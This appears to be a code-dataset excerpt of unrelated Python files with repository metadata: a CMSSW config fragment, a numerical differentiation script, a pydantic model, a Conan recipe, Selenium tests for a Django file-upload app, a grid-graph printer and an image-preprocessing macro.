                              moduleName = 't0DB',record = 'DTT0Rcd',tag = 't0',
                              connect = 'sqlite_file:%s' % os.path.basename(self.config.inputT0DB))

        if hasattr(self.config,'runOnRAW') and self.config.runOnRAW:
            if hasattr(self.config,'runOnMC') and self.config.runOnMC:
                getattr(self.process,self.config.digilabel).inputLabel = 'rawDataCollector'
            prependPaths(self.process,self.config.digilabel)

        if hasattr(self.config,'preselection') and self.config.preselection:
            pathsequence = self.config.preselection.split(':')[0]
            seqname = self.config.preselection.split(':')[1]
            self.process.load(pathsequence)
            prependPaths(self.process,seqname)

    def initCrab(self):
        crab_cfg_parser = loadCrabCfg()
        loadCrabDefault(crab_cfg_parser,self.config)
        crab_cfg_parser.set('CMSSW','pset',self.pset_name)
        crab_cfg_parser.set('CMSSW','output_file',self.outputfile)
        crab_cfg_parser.remove_option('USER','additional_input_files')
        #if self.inputdb:
        #    addCrabInputFile(crab_cfg_parser,self.inputdb)
        if hasattr(self.config,'inputTTrigDB') and self.config.inputTTrigDB:
            addCrabInputFile(crab_cfg_parser,self.config.inputTTrigDB)
        if hasattr(self.config,'inputVDriftDB') and self.config.inputVDriftDB:
            addCrabInputFile(crab_cfg_parser,self.config.inputVDriftDB)
        if hasattr(self.config,'inputT0DB') and self.config.inputT0DB:
            addCrabInputFile(crab_cfg_parser,self.config.inputT0DB)
        self.crab_cfg = crab_cfg_parser

    def writeCfg(self):
        writeCfg(self.process,self.dir,self.pset_name)
        #writeCfgPkl(self.process,self.dir,self.pset_name)

    def run(self):
        self.project = self.task.run()
        return self.project
| 45.217391 | 103 | 0.657692 | 445 | 4,160 | 6.033708 | 0.220225 | 0.148976 | 0.058101 | 0.084916 | 0.468901 | 0.330354 | 0.259218 | 0.236872 | 0.236872 | 0.113966 | 0 | 0.003456 | 0.234856 | 4,160 | 91 | 104 | 45.714286 | 0.840088 | 0.044471 | 0 | 0.142857 | 0 | 0 | 0.10529 | 0.026196 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.057143 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f3d38847c649b72fcc42d62c95606105c0f32cc1 | 820 | py | Python | ExamPrep/06 Differentiation/shigRichardson.py | FHomewood/ScientificComputing | bc3477b4607b25a700f2d89ca4f01cb3ea0998c4 | [
"IJG"
] | null | null | null | ExamPrep/06 Differentiation/shigRichardson.py | FHomewood/ScientificComputing | bc3477b4607b25a700f2d89ca4f01cb3ea0998c4 | [
"IJG"
] | null | null | null | ExamPrep/06 Differentiation/shigRichardson.py | FHomewood/ScientificComputing | bc3477b4607b25a700f2d89ca4f01cb3ea0998c4 | [
"IJG"
] | null | null | null | #This script takes a pair of inputs, one a point and the other an interval width, then differentiates f(x) at the selected point using the given step size. To input f(x) and f'(x), simply replace " 'FUNC' " or " 'FUNCPRIME' " with the function.
import numpy as np
#User inputs below.
x=input('Please pick an x value: ')
h=input('Please pick an h value: ')
g=h/2 #Splits the step in half for use in the Richardson extrapolation formula, for the case h_2 = h_1/2.
#Creates 4 arguments for tanh functions.
x1=x+g
x2=x-g
x3=x+h
x4=x-h
G=(('FUNC'(x1)-'FUNC'(x2))*(4/(3*h)))-(('FUNC'(x3)-'FUNC'(x4))*(1/(6*h))) #The Richardson Formula.
error=((G-('FUNCPRIME'(x))**-2)/('FUNCPRIME'(x)**-2))*100 #Error on approximation as a percentage of the true value.
print 'Richardson Extrapolation Result: ',G
print 'Error: ', error,'%'
| 37.272727 | 247 | 0.687805 | 151 | 820 | 3.721854 | 0.503311 | 0.010676 | 0.053381 | 0.060498 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031474 | 0.147561 | 820 | 21 | 248 | 39.047619 | 0.772532 | 0.578049 | 0 | 0 | 0 | 0 | 0.361765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
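The script above applies Richardson extrapolation to the central difference, combining step sizes h and h/2 to cancel the O(h^2) error term. As a hedged, self-contained sketch of that same formula (Python 3; the function name `richardson_derivative` and the use of `math.tanh` in place of the `'FUNC'` placeholder are my own illustration, not part of the original file):

```python
import math

def richardson_derivative(f, x, h):
    # Central differences at steps h/2 and h; Richardson extrapolation
    # cancels the O(h^2) error term, leaving an O(h^4) estimate.
    g = h / 2.0
    d_half = (f(x + g) - f(x - g)) / (2.0 * g)
    d_full = (f(x + h) - f(x - h)) / (2.0 * h)
    return (4.0 * d_half - d_full) / 3.0

approx = richardson_derivative(math.tanh, 0.5, 0.1)
exact = 1.0 - math.tanh(0.5) ** 2  # d/dx tanh(x) = sech^2(x) = 1 - tanh^2(x)
print(approx, exact)
```

Expanding `(4*d_half - d_full)/3` with `g = h/2` gives exactly the script's `(f(x1)-f(x2))*(4/(3*h)) - (f(x3)-f(x4))*(1/(6*h))`.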
f3d721d2677fd7cf2e8fd3efa23951b17ef439df | 287 | py | Python | server/client-server/app/models/detection.py | ioangatop/yolo | c65a72337369572bc07090f39123e2bf6ff5f4a3 | [
"MIT"
] | 1 | 2021-06-28T01:22:38.000Z | 2021-06-28T01:22:38.000Z | server/client-server/app/models/detection.py | ioangatop/yolo | c65a72337369572bc07090f39123e2bf6ff5f4a3 | [
"MIT"
] | null | null | null | server/client-server/app/models/detection.py | ioangatop/yolo | c65a72337369572bc07090f39123e2bf6ff5f4a3 | [
"MIT"
] | null | null | null | from pydantic import BaseModel
from typing import List


class DetectionModel(BaseModel):
    class Detection(BaseModel):
        bbox: List[int]
        score: float
        category_id: int
        label: str
        segmentation: List[List[List[int]]]

    detections: List[Detection]
| 22.076923 | 43 | 0.665505 | 32 | 287 | 5.9375 | 0.59375 | 0.073684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25784 | 287 | 12 | 44 | 23.916667 | 0.892019 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f3d8515a3338d8385cf2bebf5ed4ad028409b12a | 1,054 | py | Python | conanfile.py | bincrafters/conan-clara | 249560de1fa2a8b1ecc2d2b1e517a6d1ea0e37ed | [
"MIT"
] | null | null | null | conanfile.py | bincrafters/conan-clara | 249560de1fa2a8b1ecc2d2b1e517a6d1ea0e37ed | [
"MIT"
] | null | null | null | conanfile.py | bincrafters/conan-clara | 249560de1fa2a8b1ecc2d2b1e517a6d1ea0e37ed | [
"MIT"
] | null | null | null | from conans import ConanFile, tools
import os


class ClaraConan(ConanFile):
    name = "clara"
    version = "1.1.5"
    description = "A simple to use, composable, command line parser for C++ 11 and beyond"
    url = "https://github.com/bincrafters/conan-clara"
    homepage = "https://github.com/catchorg/Clara"
    topics = ("conan", "clara", "cli", "cpp11", "command-parser")
    license = "BSL-1.0"
    _source_subfolder = "source_subfolder"
    exports = ["LICENSE.md"]
    no_copy_source = True

    def source(self):
        tools.get("{0}/archive/v{1}.zip".format(self.homepage, self.version))
        extracted_dir = self.name + "-" + self.version
        os.rename(extracted_dir.capitalize(), self._source_subfolder)

    def package(self):
        include_folder_src = os.path.join(self._source_subfolder, "single_include")
        self.copy(pattern="LICENSE.txt", dst="license", src=self._source_subfolder)
        self.copy(pattern="*.hpp", dst="include", src=include_folder_src)

    def package_id(self):
        self.info.header_only()
| 36.344828 | 90 | 0.666983 | 137 | 1,054 | 4.985401 | 0.540146 | 0.10981 | 0.083455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012821 | 0.185958 | 1,054 | 28 | 91 | 37.642857 | 0.783217 | 0 | 0 | 0 | 0 | 0 | 0.270398 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.086957 | 0 | 0.695652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
f3e92fc2debbd4ed8ba3dbb42a7b21159248f8b8 | 5,419 | py | Python | fileapi/tests/test_functional.py | mlavin/fileapi | 25e13399e227d14e7fd14ebeaadf535f1dc3218a | [
"BSD-2-Clause"
] | 12 | 2015-01-20T21:08:45.000Z | 2018-06-17T19:58:50.000Z | fileapi/tests/test_functional.py | mlavin/fileapi | 25e13399e227d14e7fd14ebeaadf535f1dc3218a | [
"BSD-2-Clause"
] | null | null | null | fileapi/tests/test_functional.py | mlavin/fileapi | 25e13399e227d14e7fd14ebeaadf535f1dc3218a | [
"BSD-2-Clause"
] | 5 | 2015-01-20T21:51:14.000Z | 2020-06-27T11:31:32.000Z | import os
import shutil
import tempfile

from django.contrib.auth.models import User
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from django.core.files.storage import FileSystemStorage

from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.ui import WebDriverWait

from .. import views


class FunctionalTests(StaticLiveServerTestCase):
    """Interactive tests with selenium."""

    @classmethod
    def setUpClass(cls):
        cls.browser = webdriver.PhantomJS()
        super().setUpClass()

    @classmethod
    def tearDownClass(cls):
        cls.browser.quit()
        super().tearDownClass()

    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self._orig_storage = views.storage
        views.storage = FileSystemStorage(self.temp_dir)
        self.username = 'test'
        self.password = 'test'
        User.objects.create_user(self.username, '', self.password)

    def tearDown(self):
        shutil.rmtree(self.temp_dir)
        views.storage = self._orig_storage

    def test_show_login(self):
        """The login should be shown on page load."""
        self.browser.get(self.live_server_url)
        form = self.browser.find_element_by_id('login')
        upload = self.browser.find_element_by_id('upload')
        self.assertTrue(form.is_displayed(), 'Login form should be visible.')
        self.assertFalse(upload.is_displayed(), 'Upload area should not be visible.')

    def login(self, username, password):
        """Helper for login form submission."""
        self.browser.get(self.live_server_url)
        form = self.browser.find_element_by_id('login')
        username_input = form.find_element_by_name('username')
        username_input.send_keys(username)
        password_input = form.find_element_by_name('password')
        password_input.send_keys(password)
        form.submit()

    def test_login(self):
        """Submit the login form with a valid login."""
        self.login(self.username, self.password)
        WebDriverWait(self.browser, 5).until(
            expected_conditions.visibility_of_element_located((By.ID, 'upload')))
        form = self.browser.find_element_by_id('login')
        self.assertFalse(form.is_displayed(), 'Login form should no longer be visible.')

    def test_invalid_login(self):
        """Submit the login form with an invalid login."""
        self.login(self.username, self.password[1:])
        error = WebDriverWait(self.browser, 5).until(
            expected_conditions.presence_of_element_located((By.CLASS_NAME, 'error')))
        self.assertEqual('Invalid username/password', error.text)
        form = self.browser.find_element_by_id('login')
        self.assertTrue(form.is_displayed(), 'Login form should still be visible.')

    def test_browse_files(self):
        """Browse existing uploads."""
        _, test_file = tempfile.mkstemp(dir=self.temp_dir)
        self.login(self.username, self.password)
        element = WebDriverWait(self.browser, 5).until(
            expected_conditions.presence_of_element_located((By.CLASS_NAME, 'file')))
        self.assertIn(os.path.basename(test_file), element.text)

    def test_file_delete(self):
        """Delete uploaded file."""
        _, test_file = tempfile.mkstemp(dir=self.temp_dir)
        self.login(self.username, self.password)
        element = WebDriverWait(self.browser, 5).until(
            expected_conditions.presence_of_element_located((By.CLASS_NAME, 'file')))
        element.find_element_by_class_name('delete').click()
        self.browser.implicitly_wait(1)
        with self.assertRaises(NoSuchElementException):
            self.browser.find_element_by_class_name('file')
        self.assertFalse(os.path.exists(test_file))

    def upload(self, filepath):
        # Create a file input for the fake drag and drop
        self.browser.execute_script('''
            input = $('<input>', {id: 'seleniumUpload', type: 'file'}).appendTo('body');
        ''');
        self.browser.find_element_by_id('seleniumUpload').send_keys(filepath)
        # Fake a file drag and drop event
        self.browser.execute_script('''
            event = $.Event('drop');
            event.originalEvent = {
                dataTransfer: {files: input.get(0).files}
            };
            $('#upload').trigger(event);
        ''');

    def test_file_upload(self):
        """Drag and drop a new file upload."""
        self.login(self.username, self.password)
        _, test_file = tempfile.mkstemp()
        with open(test_file, 'w') as f:
            f.write('XXX')
        self.upload(test_file)
        element = WebDriverWait(self.browser, 5).until(
            expected_conditions.presence_of_element_located((By.CLASS_NAME, 'file')))
        self.assertIn(os.path.basename(test_file), element.text)

    def test_invalid_file(self):
        """Drag and drop an empty (invalid) file upload."""
        self.login(self.username, self.password)
        _, test_file = tempfile.mkstemp()
        self.upload(test_file)
        element = WebDriverWait(self.browser, 5).until(
            expected_conditions.presence_of_element_located((By.CLASS_NAME, 'error')))
        self.assertEqual('The submitted file is empty.', element.text) | 38.985612 | 90 | 0.667466 | 645 | 5,419 | 5.426357 | 0.226357 | 0.056571 | 0.037143 | 0.048 | 0.463429 | 0.445429 | 0.407143 | 0.354 | 0.33 | 0.307714 | 0 | 0.002121 | 0.217014 | 5,419 | 139 | 91 | 38.985612 | 0.822767 | 0.069939 | 0 | 0.333333 | 0 | 0 | 0.118142 | 0.010813 | 0 | 0 | 0 | 0 | 0.098039 | 1 | 0.127451 | false | 0.117647 | 0.117647 | 0 | 0.254902 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
f3f141bdc04d2f72d58f01681d83051418752dbc | 1,462 | py | Python | DomJudge/practica4/GRIDGRAP.py | Camiloasc1/AlgorithmsUNAL | 1542b8f2c170f9b5a24638f05ae50fa2c85cfc7b | [
"MIT"
] | null | null | null | DomJudge/practica4/GRIDGRAP.py | Camiloasc1/AlgorithmsUNAL | 1542b8f2c170f9b5a24638f05ae50fa2c85cfc7b | [
"MIT"
] | null | null | null | DomJudge/practica4/GRIDGRAP.py | Camiloasc1/AlgorithmsUNAL | 1542b8f2c170f9b5a24638f05ae50fa2c85cfc7b | [
"MIT"
] | null | null | null | import sys


def solve2(n, m):
    if n == 1 and m == 1:
        return []
    check = []
    count = 1
    for i in xrange(n):
        for j in xrange(m):
            if j + 1 <= m and (count + 1 <= (n * m)) and not(count + 1 > m * (i + 1)):
                check.append([count, count + 1])
            if (i + 1 <= n) and ((m * (i + 1)) + j + 1 <= (n * m)):
                check.append([count, (m * (i + 1)) + j + 1])
            count += 1
    return check


def solve(n1, m):
    if n1 == 1 and m == 1:
        return []
    G = []
    count = 1
    for i in xrange(n1):
        G.append([])
        for j in xrange(m):
            G[i].append(count)
            count += 1
    check = []
    for i in xrange(n1):
        for j in xrange(m):
            if j + 1 < m:
                check.append([G[i][j], G[i][j + 1]])
            if i + 1 < n1:
                check.append([G[i][j], G[i + 1][j]])
            count += 1
    return check


def printList(edges):
    i = 0
    check = ""
    for edge in edges:
        if i < 1:
            i = 1
            check += str(edge[0]) + "-" + str(edge[1])
        else:
            check += " " + edge[0].__str__() + "-" + edge[1].__str__()
    print check


def gridGraph():
    input = sys.stdin.read().splitlines()
    for line in input:
        nums = line.split()
        n = int(nums[0])
        m = int(nums[1])
        edgeList = solve(n, m)
        printList(edgeList)


gridGraph()
| 24.779661 | 86 | 0.406293 | 205 | 1,462 | 2.858537 | 0.190244 | 0.081911 | 0.061433 | 0.061433 | 0.397611 | 0.177474 | 0.116041 | 0.061433 | 0.061433 | 0 | 0 | 0.045238 | 0.425445 | 1,462 | 58 | 87 | 25.206897 | 0.652381 | 0 | 0 | 0.307692 | 0 | 0 | 0.002052 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.019231 | null | null | 0.057692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
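The `solve` routine above builds the full node-number matrix `G` before enumerating right and down neighbours. An equivalent index-arithmetic version that skips the intermediate matrix can be sketched as follows (Python 3; the name `grid_edges` is my own, not from the original file):

```python
def grid_edges(n, m):
    # Nodes of an n x m grid are numbered 1..n*m in row-major order;
    # each node links to its right and down neighbours, matching solve().
    edges = []
    for i in range(n):
        for j in range(m):
            node = i * m + j + 1
            if j + 1 < m:
                edges.append([node, node + 1])   # right neighbour
            if i + 1 < n:
                edges.append([node, node + m])   # down neighbour
    return edges

print(grid_edges(2, 3))
```

An n x m grid has n*(m-1) horizontal plus m*(n-1) vertical edges, which this enumeration produces in the same order as `solve`.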
f3f696fb5d353f40355ec08222eead1d79939673 | 1,202 | py | Python | dvc_preprocessing/macros.py | pedrodamas0803/dvc_preprocessing | eeb307f94b96567d612b4db2c277561c4ec2296f | [
"MIT"
] | null | null | null | dvc_preprocessing/macros.py | pedrodamas0803/dvc_preprocessing | eeb307f94b96567d612b4db2c277561c4ec2296f | [
"MIT"
] | null | null | null | dvc_preprocessing/macros.py | pedrodamas0803/dvc_preprocessing | eeb307f94b96567d612b4db2c277561c4ec2296f | [
"MIT"
] | null | null | null | from dvc_preprocessing import plot, preprocessing, constants
from skimage.filters import threshold_otsu
import numpy as np


def auto_processing(filename, dirpath='./', data_type=np.int16, init_slice=0, final_slice="last", outname="output", ret=True):
    '''
    TODO: add outpath
    '''
    stack = preprocessing.read_images_from_h5(filename, data_type, dirpath)

    threshold_value = threshold_otsu(stack)
    print(f'Threshold value: {threshold_value}.')

    stack = preprocessing.intensity_rescaling(stack)

    if data_type == np.int8:
        stack[stack < threshold_value] = constants.INT8MINVAL()
    else:
        stack[stack < threshold_value] = constants.INT16MINVAL()

    if final_slice == "last":
        final_slice = stack.shape[0]

    CoM = preprocessing.volume_CoM(stack, init_slice, final_slice)
    print(f'The center of mass is {CoM}')

    if init_slice != 0 or final_slice != "last":
        stack = preprocessing.crop_around_CoM(
            stack, CoM, (init_slice, final_slice))
    else:
        stack = preprocessing.crop_around_CoM(stack, CoM)

    preprocessing.save_3d_tiff(stack, outname, dirpath)

    if ret:
        return stack, CoM, threshold_value
| 30.820513 | 128 | 0.693012 | 151 | 1,202 | 5.298013 | 0.410596 | 0.075 | 0.0525 | 0.06 | 0.18 | 0.0975 | 0.0975 | 0 | 0 | 0 | 0 | 0.011435 | 0.199667 | 1,202 | 38 | 129 | 31.631579 | 0.820166 | 0.014143 | 0 | 0.083333 | 0 | 0 | 0.073567 | 0 | 0 | 0 | 0 | 0.026316 | 0 | 1 | 0.041667 | false | 0 | 0.125 | 0 | 0.208333 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |